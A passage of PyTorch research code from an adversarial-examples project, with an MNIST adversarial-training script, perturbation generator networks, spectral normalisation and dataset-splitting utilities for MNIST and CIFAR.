model = model_mnist(type=args.type).to(device)
optimizer = optim.Adam(model.parameters())
# Train model
if args.train_adv:
x_advs = [None] * (len(adv_models) + 1)
for epoch in range(args.epochs):
for batch_idx, (data, labels) in enumerate(train_loader):
data, labels = data.to(device), labels.to(device)
for i, m in enumerate(adv_models + [model]):
grad = gen_grad(data, m, labels, loss='training')
x_advs[i] = symbolic_fgs(data, grad, eps=eps)
loss_model = train_ens(epoch, batch_idx, model, data, labels, optimizer, x_advs=x_advs)
else:
for epoch in range(int(args.epochs / 2)):
for batch_idx, (data, labels) in enumerate(train_loader):
data, labels = data.to(device), labels.to(device)
loss_model = train_ens(epoch, batch_idx, model, data, labels, optimizer)
# Finally print the result
correct = 0
with torch.no_grad():
for (data, labels) in test_loader:
data, labels = data.to(device), labels.to(device)
correct += test(model, data, labels)
test_error = 100. - 100. * correct / len(test_loader.dataset)
print('Test Set Error Rate: {:.2f}%'.format(test_error))
path = os.path.join(args.dir_test_models, "pretrained_classifiers",
args.dataset, "ensemble_adv_trained", args.model)
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(model.state_dict(), path + args.namestr + '.pt')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Adversarial Training MNIST model')
parser.add_argument('--model', help='path to model')
parser.add_argument('--adv_models', nargs='*', help='path to adv model(s)')
parser.add_argument('--type', type=int, default=0, help='Model type (default: 0)')
parser.add_argument('--seed', type=int, default=1, help='Random seed (default: 1)')
parser.add_argument('--disable_cuda', action='store_true', default=False, help='Disable CUDA (default: False)')
parser.add_argument('--epochs', type=int, default=12, help='Number of epochs (default: 12)')
parser.add_argument('--dataset', type=str, default='mnist')
parser.add_argument('--train_adv', default=False, action='store_true',
help='Whether to train normally or Adversarially')
parser.add_argument("--wandb", action="store_true", default=False, help='Use wandb for logging')
parser.add_argument('--batch_size', type=int, default=256, metavar='S')
parser.add_argument('--test_batch_size', type=int, default=512, metavar='S')
parser.add_argument('--train_set', default='train',
choices=['train_and_test','test','train'],
help='add the test set in the training set')
parser.add_argument('--attack_ball', type=str, default="Linf",
choices= ['L2','Linf'])
parser.add_argument('--architecture', default="VGG16",
help="The architecture we want to attack on CIFAR.")
parser.add_argument('--dir_test_models', type=str, default="../",
help="The path to the directory containing the classifier models for evaluation.")
parser.add_argument('--epsilon', type=float, default=0.1, metavar='M',
help='Epsilon for Delta (default: 0.1)')
parser.add_argument('--train_with_critic_path', type=str, default=None,
help='Train generator with saved critic model')
parser.add_argument('--namestr', type=str, default='1', \
help='additional info in output filename to describe experiments')
args = parser.parse_args()
args.dev = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
args.cuda = not args.disable_cuda and torch.cuda.is_available()
main(args)
```
#### File: Adversarial-Example-Games/models/generators.py
```python
import torch
import math
from torch import nn, optim
import torch.nn.functional as F
from torch.autograd import Variable
from torch.distributions.multivariate_normal import MultivariateNormal
import ipdb
from torch.distributions import Normal
from flows import *
def entropy(input):
max_input, _ = torch.max(input, 1)
input = input - max_input.view(-1, 1).repeat(1, input.shape[1])
softval = F.softmax(input, 1)
entropy = torch.sum(softval *
(input - input.exp().sum(1).log().view(-1, 1).repeat(1, 10)),1)
return torch.mean(entropy)
def sample(input, dim=-1):
softval = F.softmax(input,dim)
index = torch.multinomial(softval,1).view(-1)
output = torch.zeros_like(softval)
output[torch.arange(softval.shape[0]),index] = 1.
# output.eq_(0.)
return output.detach(), entropy
class SampleST(torch.autograd.Function):
@staticmethod
def forward(ctx, input, dim):
output, entropy = sample(input, dim=dim)
ctx.save_for_backward(input, output)
ctx.other_params = dim
return output
@staticmethod
def backward(ctx, grad_output):
gr = None
if ctx.needs_input_grad[0]:
input, output = ctx.saved_variables
dim = ctx.other_params
s = F.softmax(input, dim)
gs = (grad_output * s).sum(dim, True)
gr = s * (grad_output - gs)
return gr, None
class Bottleneck(nn.Module):
def __init__(self, in_planes, growth_rate):
super(Bottleneck, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, 4*growth_rate, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm2d(4*growth_rate)
self.conv2 = nn.Conv2d(4*growth_rate, growth_rate, kernel_size=3, padding=1, bias=False)
def forward(self, x):
out = self.conv1(F.relu(self.bn1(x)))
out = self.conv2(F.relu(self.bn2(out)))
out = torch.cat([out,x], 1)
return out
class Transition(nn.Module):
def __init__(self, in_planes, out_planes):
super(Transition, self).__init__()
self.bn = nn.BatchNorm2d(in_planes)
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)
def forward(self, x):
out = self.conv(F.relu(self.bn(x)))
out = F.avg_pool2d(out, 2)
return out
# Initialize weights
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
torch.nn.init.xavier_uniform_(m.weight)
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
class UnFlatten(nn.Module):
def forward(self, input, size=192):
return input.view(input.size(0), size, 1, 1)
class Generator(nn.Module):
def __init__(self, input_size, latent=50, deterministic=False):
"""
A modified VAE. Latent is Gaussian (0, sigma) of dimension latent.
Decode latent to a noise vector of `input_size`,
Note the Gaussian \mu is not learned since input `x` acts as mean
Args:
input_size: size of image, 784 in case of MNIST
latent: size of multivar Gaussian params
"""
super(Generator, self).__init__()
self.input_size = input_size
self.deterministic = deterministic
self.fc1_mu = nn.Linear(input_size, 400)
self.fc1_sig = nn.Linear(input_size, 400)
self.fc2_sig = nn.Linear(400, latent)
self.fc2_mu = nn.Linear(400,latent)
self.fc3 = nn.Linear(latent, 400)
self.fc4 = nn.Linear(400, input_size)
def encode(self, x):
h_mu = F.relu(self.fc1_mu(x))
h_sig = F.relu(self.fc1_sig(x))
return self.fc2_mu(h_mu), self.fc2_sig(h_sig)
def reparameterize(self, mu, logvar):
std = torch.exp(0.5*logvar)
eps = torch.randn_like(std)
sample = eps.mul(std).add_(mu)
# covar_mat = torch.diag(sample[0])
return sample
def decode(self, z):
"""
Final layer should probably not have activation?
"""
h3 = F.relu(self.fc3(z))
return self.fc4(h3)
def forward(self, x, epsilon, target=None):
mu, logvar = self.encode(x.view(-1, self.input_size))
z = self.reparameterize(mu, logvar)
delta = self.decode(z)
if self.deterministic:
kl_div = torch.Tensor([0.]).cuda()
else:
kl_div = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())
kl_div = kl_div
kl_div = kl_div / x.size(0) # mean over batch
return delta, kl_div
class ConvGenerator(nn.Module):
def __init__(self, nchannels, block, nblocks, deterministic, flow_args, growth_rate=12, reduction=0.5,\
num_classes=10, latent=50, norm="Linf"):
"""
A modified VAE.
Encode the image into h to generate a probability vector p
use p to sample a categorical variable (using gamble softmax)
Decode the concatenation of h and the categorical variable into a delta.
"""
super(ConvGenerator, self).__init__()
self.growth_rate = growth_rate
self.norm = norm
num_planes = 2*growth_rate
self.conv1 = nn.Conv2d(nchannels, num_planes, kernel_size=3, padding=1, bias=False)
self.dense1 = self._make_dense_layers(block, num_planes, nblocks[0])
num_planes += nblocks[0]*growth_rate
out_planes = int(math.floor(num_planes*reduction))
self.trans1 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense2 = self._make_dense_layers(block, num_planes, nblocks[1])
num_planes += nblocks[1]*growth_rate
out_planes = int(math.floor(num_planes*reduction))
self.trans2 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense3 = self._make_dense_layers(block, num_planes, nblocks[2])
num_planes += nblocks[2]*growth_rate
out_planes = int(math.floor(num_planes*reduction))
self.trans3 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense4 = self._make_dense_layers(block, num_planes, nblocks[3])
num_planes += nblocks[3]*growth_rate
self.bn = nn.BatchNorm2d(num_planes)
self.linear_1 = nn.Linear(num_planes+1, 100)
self.linear_2 = nn.Linear(100, num_classes)
self.linear_3 = nn.Linear(num_classes,latent)
ngf = 64
self.latent = latent
self.log_det_j = 0.
self.deterministic = deterministic
_st_sample = SampleST()
self.sample = lambda x, target=None: _st_sample.apply(x, 1, target)
n_blocks, flow_hidden_size, n_hidden = flow_args[0], flow_args[1], flow_args[2]
flow_model, flow_layer_type = flow_args[3], flow_args[4]
self.flow_model = flow_model
# Flow parameters
if flow_model is not None:
self.flow = flows
self.num_flows = 30
self.num_flows = self.num_flows
# Amortized flow parameters
self.amor_u = nn.Linear(num_planes, self.num_flows * self.latent)
self.amor_w = nn.Linear(num_planes, self.num_flows * self.latent)
self.amor_b = nn.Linear(num_planes, self.num_flows)
# Normalizing flow layers
for k in range(self.num_flows):
flow_k = self.flow()
self.add_module('flow_' + str(k), flow_k)
self.decoder = nn.Sequential(
# input is Z, going into a convolution
nn.ConvTranspose2d(num_planes+1+latent, ngf * 8, 4, 1, 0, bias=False),
nn.BatchNorm2d(ngf * 8),
nn.ReLU(True),
# state size. (ngf*8) x 4 x 4
nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),
nn.BatchNorm2d(ngf * 4),
nn.ReLU(True),
# # state size. (ngf*4) x 8 x 8
nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),
nn.BatchNorm2d(ngf * 2),
nn.ReLU(True),
# # state size. (ngf*2) x 16 x 16
nn.ConvTranspose2d(ngf * 2, 3, 4, 2, 1, bias=False),
nn.BatchNorm2d(3),
nn.ReLU(True),
# # state size. (ngf) x 32 x 32
nn.Tanh()
)
def _make_dense_layers(self, block, in_planes, nblock):
layers = []
for i in range(nblock):
layers.append(block(in_planes, self.growth_rate))
in_planes += self.growth_rate
return nn.Sequential(*layers)
def encode(self, out):
batch_size = out.size(0)
out_1 = self.linear_1(out)
out_2 = self.linear_2(out)
h1 = F.relu(out_1)
h2 = F.relu(out_2)
u,w,b = None,None,None
if self.flow_model is not None:
# return amortized u an w for all flows
u = self.amor_u(out).view(batch_size, self.num_flows, self.latent, 1)
w = self.amor_w(out).view(batch_size, self.num_flows, 1, self.latent)
b = self.amor_b(out).view(batch_size, self.num_flows, 1, 1)
return h1,h2,u,w,b
def reparameterize(self, mu, logvar):
if self.deterministic:
z = mu + logvar.mul(0.5).exp_()
return z
else:
std = logvar.mul(0.5).exp_()
eps = torch.cuda.FloatTensor(std.size()).normal_()
eps = Variable(eps)
return eps.mul(std).add_(mu)
def decode(self, z):
z = z.view(-1,self.latent,1,1)
gen = self.decoder(z)
return gen
def forward(self, x, epsilon, target=None):
out = self.conv1(x)
out = self.trans1(self.dense1(out))
out = self.trans2(self.dense2(out))
out = self.trans3(self.dense3(out))
out = self.dense4(out)
out = F.avg_pool2d(F.relu(self.bn(out)), 4)
h = out.view(out.size(0), -1)
# mu,logvar,u,w,b = self.encode(out)
# h = self.reparameterize(mu,logvar)
h = torch.cat((h, epsilon.repeat(x.shape[0], 1)), 1)
logits = self.linear_2(F.relu(self.linear_1(h)))
one_hot = self.sample(logits, target=target)
z = F.relu(self.linear_3(one_hot)) # 8,2,2
h = torch.cat((h, z), 1).view(out.size(0), -1, 1, 1)
delta = self.decoder(h)
# delta = out.view(-1, self.img_dim) - x.view(-1,self.img_dim)
if self.norm == "Linf":
delta = epsilon.item() * delta
elif self.norm == "L2":
raise("L2 norm not implemented on CIFAR not implemented")
norm = torch.norm(delta, dim=1).view(-1, 1).repeat(1, self.img_dim)
mask_norm = norm > epsilon
delta = ~mask_norm * delta + epsilon * delta * mask_norm / norm
else:
NotImplementedError(f"Generator architecture not implemented for norm: {self.norm}")
return torch.clamp(x + delta, min=0., max=1.), entropy(logits)
class DCGAN(nn.Module):
def __init__(self, num_channels=3, ngf=100):
super(DCGAN, self).__init__()
"""
Initialize a DCGAN. Perturbations from the GAN are added to the inputs to
create adversarial attacks.
- num_channels is the number of channels in the input
- ngf is size of the conv layers
"""
self.generator = nn.Sequential(
# input is (nc) x 32 x 32
nn.Conv2d(num_channels, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 1, 1, 0, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 3 x 32 x 32
nn.Conv2d(ngf, num_channels, 1, 1, 0, bias=False),
nn.Tanh()
)
def forward(self, inputs, target=None):
return self.generator(inputs), inputs
def save(self, fn):
torch.save(self.generator.state_dict(), fn)
def load(self, fn):
self.generator.load_state_dict(torch.load(fn))
class Cond_DCGAN(nn.Module):
def __init__(self, num_channels=3, ngf=100):
super(Cond_DCGAN, self).__init__()
"""
Initialize a DCGAN. Perturbations from the GAN are added to the inputs to
create adversarial attacks.
- num_channels is the number of channels in the input
- ngf is size of the conv layers
"""
self.fcy = nn.Linear(10,100)
self.fcz = nn.Linear(784, 200)
self.generator = nn.Sequential(
# input is (nc) x 32 x 32
nn.Conv2d(num_channels, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 1, 1, 0, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 3 x 32 x 32
nn.Conv2d(ngf, num_channels, 1, 1, 0, bias=False),
nn.Tanh()
)
def forward(self, inputs, labels=None, nb_digits=10, target=None):
if labels is None:
batch_size = inputs.shape[0]
y = torch.randint(0, nb_digits,(batch_size,1))
# One hot encoding buffer that you create out of the loop and just keep reusing
y_onehot = torch.zeros(batch_size, nb_digits)
labels = y_onehot.scatter_(1, y, 1)
x = F.relu(self.fcz(inputs))
y = F.relu(self.fcy(labels))
inputs = torch.cat([x, y], 1)
return self.generator(inputs), inputs
def save(self, fn):
torch.save(self.generator.state_dict(), fn)
def load(self, fn):
self.generator.load_state_dict(torch.load(fn))
class MnistGenerator(nn.Module):
def __init__(self, norm="Linf"):
super(MnistGenerator, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(1, 64, 3, stride=3, padding=1), # b, 64, 10, 10
nn.LeakyReLU(0.2),
nn.MaxPool2d(2, stride=2), # b, 64, 5, 5
nn.Conv2d(64, 32, 3, stride=2, padding=1), # b, 32, 3, 3
nn.LeakyReLU(0.2),
nn.MaxPool2d(2, stride=1) # b, 32, 2, 2
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(64, 32, 3, stride=2), # b, 32, 5, 5
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 5, stride=3, padding=1), # b, 16, 15, 15
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 1, 2, stride=2, padding=1), # b, 1, 28, 28
nn.Tanh()
)
_st_sample = SampleST()
self.sample = lambda x: _st_sample.apply(x,1)
self.fc = nn.Sequential(
nn.Linear(32*2*2+1,64),
nn.LeakyReLU(.2),
nn.Linear(64,10))
self.fc_z = nn.Linear(10,32*2*2-1)
self.fc_input = nn.Linear(10,32*2*2-1)
self.norm = norm
self.img_dim = 28*28
def forward(self, x, epsilon, target=None):
h = self.encoder(x)
h = torch.cat((h.view(-1,32*2*2),epsilon.repeat(x.shape[0],1)),1)
logits = self.fc(h.view(-1,32*2*2+1))
one_hot = self.sample(logits)
z = self.fc_z(one_hot)
if target is not None:
target_onehot = torch.zeros(target.size() + (10,)).cuda()
target_onehot.scatter_(1, target.detach().unsqueeze(1), 1)
z += self.fc_input(target_onehot)
z = F.relu(z)
h = torch.cat((h,z),1).view(-1,64,2,2)
# delta = self.decoder(h).view(-1,self.img_dim)
out = .5*(self.decoder(h) + 1.)
delta = out - x
if self.norm == "Linf":
delta = epsilon.item() * delta
elif self.norm == "L2":
norm = torch.norm(delta, dim=1).view(-1,1).repeat(1,self.img_dim)
mask_norm = norm > self.epsilon
delta = ~mask_norm * delta + self.epsilon * delta * mask_norm / norm
else:
NotImplementedError(f"Generator architecture not implemented for norm: {self.norm}" )
output = x + delta
return output , entropy(logits)
# if self.norm == "Linf":
# delta = epsilon.item() * delta
# elif self.norm == "L2":
# norm = torch.norm(delta, dim=1).view(-1, 1).repeat(1, self.img_dim)
# mask_norm = norm > epsilon
# delta = ~mask_norm * delta + epsilon * delta * mask_norm / norm
# else:
# NotImplementedError(f"Generator architecture not implemented for norm: {self.norm}")
# output = x.view(-1, self.img_dim) + delta
# return output , entropy(logits)
def save(self, fn_enc, fn_dec):
torch.save(self.encoder.state_dict(), fn_enc)
torch.save(self.decoder.state_dict(), fn_dec)
def load(self, fn_enc, fn_dec):
self.encoder.load_state_dict(torch.load(fn_enc))
self.decoder.load_state_dict(torch.load(fn_dec))
class ResnetGenerator(nn.Module):
"""Resnet-based generator that consists of Resnet blocks between a few downsampling/upsampling operations.
We adapt Torch code and idea from <NAME>'s neural style transfer project(https://github.com/jcjohnson/fast-neural-style)
"""
def __init__(self, device, input_nc, output_nc, epsilon=.3, norm="Linf",
ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False,
n_blocks=6, padding_type='reflect'):
"""Construct a Resnet-based generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
ngf (int) -- the number of filters in the last conv layer
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers
n_blocks (int) -- the number of ResNet blocks
padding_type (str) -- the name of padding layer in conv layers: reflect | replicate | zero
"""
assert(n_blocks >= 0)
super(ResnetGenerator, self).__init__()
_st_sample = SampleST()
self.sample = lambda x: _st_sample.apply(x, 1)
self.ngf=ngf
self.device = device
self.epsilon = epsilon
self.norm = norm
self.fc_z = nn.Linear(10, 63)
self.fc_input = nn.Linear(10,63)
self.fc_h = nn.Sequential(
nn.Linear(16*32*32-63,100),
nn.ReLU(True),
nn.Linear(100,10)
)
use_bias = norm_layer == nn.InstanceNorm2d
pre_model = [nn.ReflectionPad2d(3),
nn.Conv2d(input_nc, ngf-1, kernel_size=7, padding=0, bias=use_bias),
norm_layer(ngf-1),
nn.ReLU(True)]
n_downsampling = 2
for i in range(n_downsampling): # add downsampling layers
mult = 2 ** i
pre_model += [nn.Conv2d(ngf * mult-1, ngf * mult * 2-1, kernel_size=3, stride=2, padding=1, bias=use_bias),
norm_layer(ngf * mult * 2-1),
nn.ReLU(True)]
mult = 2 ** n_downsampling
assert(n_blocks % 2 == 0)
for i in range(n_blocks//2): # add ResNet blocks
pre_model += [ResnetBlock(ngf * mult-1, padding_type=padding_type,
norm_layer=norm_layer,
use_dropout=use_dropout, use_bias=use_bias)]
self.pre_model = nn.Sequential(*pre_model)
model = []
for i in range(n_blocks//2):
model += [ResnetBlock(ngf * mult, padding_type=padding_type,
norm_layer=norm_layer,
use_dropout=use_dropout, use_bias=use_bias)]
for i in range(n_downsampling): # add upsampling layers
mult = 2 ** (n_downsampling - i)
model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2),
kernel_size=3, stride=2,
padding=1, output_padding=1,
bias=use_bias),
norm_layer(int(ngf * mult / 2)),
nn.ReLU(True)]
model += [nn.ReflectionPad2d(3)]
model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)]
model += [nn.Tanh()]
self.model = nn.Sequential(*model)
def forward(self, input, epsilon, target=None):
"""Standard forward"""
h = self.pre_model(input)
batch_size = input.shape[0]
h = torch.cat((h.view(batch_size, -1), epsilon.repeat(batch_size, 1)), 1)
logit = self.fc_h(h)
one_hot = self.sample(logit)
z = self.fc_z(one_hot)
if target is not None:
target_onehot = torch.zeros(target.size() + (10,)).cuda()
target_onehot.scatter_(1, target.detach().unsqueeze(1), 1)
z += self.fc_input(target_onehot)
z = F.relu(z)
h = torch.cat((h,z),1).view(batch_size,256,8,8)
delta = self.model(h)
if self.norm == "Linf":
delta = epsilon.item() * delta # outputs in [-1,1]
else:
norm = torch.norm(delta, p=2,dim=(1,2,3)).view(-1, 1,1,1).repeat(1, 3,32,32)
mask_norm = norm > self.epsilon
delta = ~mask_norm * delta + epsilon * delta * mask_norm / norm
return input + delta, entropy(logit)
class ResnetBlock(nn.Module):
"""Define a Resnet block"""
def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias):
"""Initialize the Resnet block
A resnet block is a conv block with skip connections
We construct a conv block with build_conv_block function,
and implement skip connections in <forward> function.
Original Resnet paper: https://arxiv.org/pdf/1512.03385.pdf
"""
super(ResnetBlock, self).__init__()
self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias)
def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias):
"""Construct a convolutional block.
Parameters:
dim (int) -- the number of channels in the conv layer.
padding_type (str) -- the name of padding layer: reflect | replicate | zero
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers.
use_bias (bool) -- if the conv layer uses bias or not
Returns a conv block (with a conv layer, a normalization layer, and a non-linearity layer (ReLU))
"""
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim), nn.ReLU(True)]
if use_dropout:
conv_block += [nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim)]
return nn.Sequential(*conv_block)
def forward(self, x):
"""Forward function (with skip connections)"""
out = x + self.conv_block(x) # add skip connections
return out
```
#### File: Adversarial-Example-Games/models/spectral_normalization.py
```python
import torch
from torch.optim.optimizer import Optimizer, required
from torch.autograd import Variable
import torch.nn.functional as F
from torch import nn
from torch import Tensor
from torch.nn import Parameter
def l2normalize(v, eps=1e-12):
return v / (v.norm() + eps)
class SpectralNorm(nn.Module):
def __init__(self, module, name='weight', power_iterations=1):
super(SpectralNorm, self).__init__()
self.module = module
self.name = name
self.power_iterations = power_iterations
if not self._made_params():
self._make_params()
def _update_u_v(self):
u = getattr(self.module, self.name + "_u")
v = getattr(self.module, self.name + "_v")
w = getattr(self.module, self.name + "_bar")
height = w.data.shape[0]
for _ in range(self.power_iterations):
v.data = l2normalize(torch.mv(torch.t(w.view(height,-1).data), u.data))
u.data = l2normalize(torch.mv(w.view(height,-1).data, v.data))
# sigma = torch.dot(u.data, torch.mv(w.view(height,-1).data, v.data))
sigma = u.dot(w.view(height, -1).mv(v))
setattr(self.module, self.name, w / sigma.expand_as(w))
def _made_params(self):
try:
u = getattr(self.module, self.name + "_u")
v = getattr(self.module, self.name + "_v")
w = getattr(self.module, self.name + "_bar")
return True
except AttributeError:
return False
def _make_params(self):
w = getattr(self.module, self.name)
height = w.data.shape[0]
width = w.view(height, -1).data.shape[1]
u = Parameter(w.data.new(height).normal_(0, 1), requires_grad=False)
v = Parameter(w.data.new(width).normal_(0, 1), requires_grad=False)
u.data = l2normalize(u.data)
v.data = l2normalize(v.data)
w_bar = Parameter(w.data)
del self.module._parameters[self.name]
self.module.register_parameter(self.name + "_u", u)
self.module.register_parameter(self.name + "_v", v)
self.module.register_parameter(self.name + "_bar", w_bar)
def forward(self, *args):
self._update_u_v()
return self.module.forward(*args)
```
#### File: Adversarial-Example-Games/utils/dataset_split.py
```python
from torchvision import datasets, transforms
import torch
import os
import argparse
import ipdb
from numpy.random import default_rng
from torch._utils import _accumulate
from torch.utils.data import Subset
default_generator = default_rng()
def random_split(dataset, lengths, generator=default_generator):
"""
Randomly split a dataset into non-overlapping new datasets of given lengths.
Optionally fix the generator for reproducible results, e.g.:
>>> random_split(range(10), [3, 7], generator=torch.Generator().manual_seed(42))
Arguments:
dataset (Dataset): Dataset to be split
lengths (sequence): lengths of splits to be produced
generator (Generator): Generator used for the random permutation.
"""
if sum(lengths) != len(dataset):
raise ValueError("Sum of input lengths does not equal the length of the input dataset!")
indices = generator.permutation(sum(lengths)).tolist()
return [Subset(dataset, indices[offset - length : offset]) for offset, length in zip(_accumulate(lengths), lengths)]
def create_dataset_split(args, root='./data', num_splits=7,
train_split=0.8, generator=default_generator,
partition="train_and_test", augment=False, transform=None,
normalize=None):
if args.dataset == "mnist":
name = "MNIST"
else:
name = "cifar-split"
path_to_split = os.path.join(root, "%s/split_%i/data.pt"%(name,num_splits))
if os.path.exists(path_to_split):
print("Loading %i splits of the %s dataset..."%(num_splits, args.dataset))
list_split_dataset = torch.load(path_to_split)
else:
print("Split_%i dataset for %s does not exist. Creating a %i split of the dataset..."%(num_splits, args.dataset, num_splits))
if args.dataset == "mnist":
test_transforms = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
if augment:
mnist_transforms = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
elif transform is not None:
mnist_transforms = transforms
else:
mnist_transforms = transforms.Compose([
transforms.ToTensor(),
])
trainset = datasets.MNIST(root=root, train=True, download=True,
transform=mnist_transforms)
testset = datasets.MNIST(root=root, train=False, transform=mnist_transforms)
elif args.dataset == "cifar":
if augment:
transform_train = [
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor()]
else:
transform_train = [transforms.ToTensor()]
transform_test = [transforms.ToTensor()]
if normalize is not None:
transform_train.append(normalize)
transform_test.append(normalize)
transform_train = transforms.Compose(transform_train)
transform_test = transforms.Compose(transform_test)
trainset = datasets.CIFAR10(root=root, train=True,
download=True, transform=transform_train)
testset = datasets.CIFAR10(root=root, train=False,
download=True, transform=transform_test)
else:
raise ValueError()
if partition == "train_and_test":
dataset = torch.utils.data.ConcatDataset([trainset, testset])
elif partition == "train":
dataset = trainset
elif partition == "test":
dataset == testset
else:
raise ValueError()
list_splits = [len(dataset)//num_splits]*num_splits + [len(dataset)%num_splits]
split_dataset = random_split(dataset, list_splits, generator=generator)[:-1]
#split_dataset = torch.utils.data.random_split(dataset, list_splits)[:-1]
list_split_dataset = []
for dataset in split_dataset:
train_size = int(len(dataset)*train_split)
list_splits = [train_size, len(dataset)-train_size]
split = random_split(dataset, list_splits, generator=generator)
#split = torch.utils.data.random_split(dataset, list_splits)
list_split_dataset.append({"train": split[0], "test": split[1]})
dirname = os.path.dirname(path_to_split)
if not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(list_split_dataset, path_to_split)
return list_split_dataset
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--path_to_dataset', default="./data", type=str)
parser.add_argument('--dataset', default="mnist", choices=("mnist", "cifar"))
parser.add_argument('--seed', default=1234, type=int)
parser.add_argument('--num_splits', default=7, type=int)
args = parser.parse_args()
generator = default_rng(args.seed)
split_dataset = create_dataset_split(args, root=args.path_to_dataset, num_splits=args.num_splits,
generator=generator, augment=False)
print(len(split_dataset))
print(split_dataset[0])
print(len(split_dataset[0]["train"]))
```
#### File: Adversarial-Example-Games/utils/utils.py
```python
import os
import wandb
import sys
import torch
import torchvision
from torch import nn, optim
import torchvision.transforms as transforms
from torchvision import datasets
from torchvision.models import resnet50
import torchvision.utils as vutils
from torchvision.utils import save_image
import torch.nn.functional as F
import matplotlib.pyplot as plt
import torchvision.models as models
from random import randint
from PIL import Image
from cnn_models import *
from cnn_models import LeNet as Net
from cnn_models.mnist_ensemble_adv_train_models import *
from models.dcgan28 import DiscriminatorCNN28
import ipdb
import numpy as np
import random
import utils.config as cf
from utils.sls import Sls
from torch.utils.data import Subset, ConcatDataset
from utils.dataset_split import create_dataset_split
CIFAR_NORMALIZATION = transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
''' Set Random Seed '''
def seed_everything(seed):
if seed:
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def project_name(dataset_name):
if dataset_name:
return "NoBox-{}".format(dataset_name)
else:
return "NoBox"
def reduce_sum(x, keepdim=True):
for a in reversed(range(1, x.dim())):
